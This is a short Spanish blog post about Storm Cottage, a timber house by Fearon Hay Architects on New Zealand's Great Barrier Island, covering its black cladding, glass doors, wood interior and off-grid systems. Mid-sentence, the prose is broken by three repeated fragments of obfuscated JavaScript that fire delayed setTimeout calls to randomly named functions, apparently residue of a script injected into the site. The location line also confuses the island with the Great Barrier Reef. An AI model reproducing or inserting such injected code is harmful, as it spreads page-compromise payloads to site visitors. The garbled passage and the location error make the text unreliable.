Diseñador / Fearon Hay Architects
Lugar / Gran Barrera de Coral, Auckland, Nueva Zelanda

Situado en la costa este de la isla Gran Barrera, descansa la vivienda Storm Cottage diseñada por Fearon Hay Architects.

En su exterior, los listones de madera en color negro nos dan una percepción de un estilo moderno. Uno de los principales atractivos de la casa, son sus puertas de cristal que se disponen desde el suelo hasta el techo. Estas puertas cuentan con paneles herméticos que brindan protección a la vivienda.

En su interior todo es madera, los suelos y las paredes han sido barnizados aprovechandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando el color natural de la madera, lo que le aporta a la casa una sensación de calidez y la hace más acogedora.

La vivienda cuenta con paneles solares sistemas independientes para la recogida y tratamiento de aguas.

Una de las ventajas del sistema modular es que, puede emplearse una amplia variedad y gama de materiales para la realización de obras de diversa índole.

 storm-cottage-fachada storm-cottage-habitacion storm-cottage-noche storm-cottage